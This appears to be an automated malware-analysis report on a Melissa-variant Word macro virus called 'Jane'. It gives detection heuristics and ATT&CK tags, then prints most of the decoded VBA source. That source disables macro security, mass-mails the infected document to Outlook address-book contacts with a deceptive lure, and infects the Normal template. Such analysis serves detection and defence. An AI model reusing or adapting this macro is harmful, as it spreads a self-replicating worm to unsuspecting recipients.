MALICIOUS
Risk Score: 260
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV detection 'Doc.Trojan.Melissa-14' strongly indicates the Melissa family. The VBA macro explicitly uses 'CreateObject("Outlook.Application")' and iterates through the address book to send copies of itself, a hallmark of the Melissa virus. The macro also attempts to disable security settings and execute itself via the Document_Open subroutine.
Heuristics 5
- ClamAV: Doc.Trojan.Melissa-14 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Melissa-14
- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17011 bytes |

SHA-256: d4237130555857d80f42731f3d9d563bca7ae7cc1bf80374ee2b1ddc17546695
Detection: ClamAV: Doc.Trojan.Melissa-14
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Jane"
Attribute VB_Base = "1Normal.Jane"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Private Sub Document_Close()
On Error Resume Next
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'JANE! by The Marlboro KID (Killer In Descise)
'It's Inpired clearly by Melissa but the Infection bit is all mine
'Payload part is also by me...of course
'Use it, Loose it, Enjoy ha ha ha.....
'Not ment to make any greater harm....just for the hell of it..
'~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
regcheck = "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
If System.PrivateProfileString("", regcheck + "9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", regcheck + "9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1)
Options.VirusProtection = (1 - 1)
Options.SaveNormalPrompt = (1 - 1)
End If
Dim v1, v2, v3
Set v1 = CreateObject("Outlook.Application")
Set v2 = v1.GetNameSpace("MAPI")
RegAdd = "...made by 'The Marlboro KID'..."
If System.PrivateProfileString("", regcheck, "Jane!") <> RegAdd Then
If v1 = "Outlook" Then
v2.Logon "profile", "password"
For y = 1 To v2.AddressLists.Count
Set AddyBook = v2.AddressLists(y)
x = 1
Set v3 = v1.CreateItem(0)
For CountIt = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
v3.Recipients.Add Peep
x = x + 1
If x > 78 Then CountIt = AddyBook.AddressEntries.Count
Next CountIt
subj = "Is this the right E-mail address..?"
v3.Subject = subj & Application.UserName
Mezz = "Dont know if i sent this to the right E-mail,"
Mezz = Mezz + "if this isn't ment for you please dont look"
Mezz = Mezz + "at the attachments, its a private file.."
Mezz = Mezz + "ThanX ... //"
v3.Body = Mezz & Application.UserName
v3.Attachments.Add ActiveDocument.FullName
v3.Send
Peep = ""
Next y
v2.Logoff
End If
System.PrivateProfileString("", regcheck, "Jane!") = RegAdd
End If
Set ActivDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NrmTmpl = NormalTemplate.VBProject.VBComponents.Item(1)
ADCountLn = ActivDoc.CodeModule.CountOfLines
NTCountLn = NrmTmpl.CodeModule.CountOfLines
If ActivDoc.Name = "Jane" And NrmTmpl.Name = "Jane" Then GoTo THISISTHEENDMYFRIEND
If ActiveDoc.Name <> "Jane" Then
ActivDoc.Name = "Jane"
Set Dest = ActivDoc
Set Source = NrmTmpl
End If
Dim Replace
If NrmTmpl.Name <> "Jane" Then
NrmTmpl.Name = "Jane"
Replace = True
Set Dest = NrmTmpl
Set Source = ActivDoc
End If
Dim FirstName, LastName, TotalName As String
Randomize
C1 = Int((9999 - 1 + 1) * Rnd + 1)
C2 = Int((999 - 1 + 1) * Rnd + 1)
C3 = C1 * C2
If C3 < 99000000 Then
C3 = C3 + 18900000
End If
FirstName = CStr(C3)
C1 = Int((9 - 1 + 1) * Rnd + 1)
C2 = Int((99 - 1 + 1) * Rnd + 1)
C3 = C1 * C2
If C3 < 900 Then
C3 = C3 + 101
End If
LastName = CStr(C3)
TotalName = "c:\" + FirstName + "." + LastName
If Dir(TotalName) = TotalName Then
Kill (TotalName)
End If
Open TotalName For Output As #1
If Replace = True Then
Print #1, "Private Sub Document_Close()"
Else
Print #1, "Private Sub Document_Open()"
End If
For CountIt = 1 To Source.CodeModule.CountOfLines - 1
Print #1, Source.CodeModule.Lines(CountIt + 1, 1)
Next
Close #1
Dest.CodeModule.AddFromFile TotalName
Kill (TotalName)
THISISTHEENDMYFRIEND:
doc = "Document"
If NTCountLn <> 0 And ADCountLn = 0 And (InStr(1, ActiveDocument.Name, doc) = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If
If Day(Now) = 13 And WeekDay(Now)
... (truncated)